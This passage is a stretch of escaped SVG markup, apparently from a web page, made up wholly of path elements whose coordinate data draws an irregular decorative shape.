d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n        <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n        <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n        <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n        <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n        <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n        <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n        <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n        <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n        <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n        <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n        <path 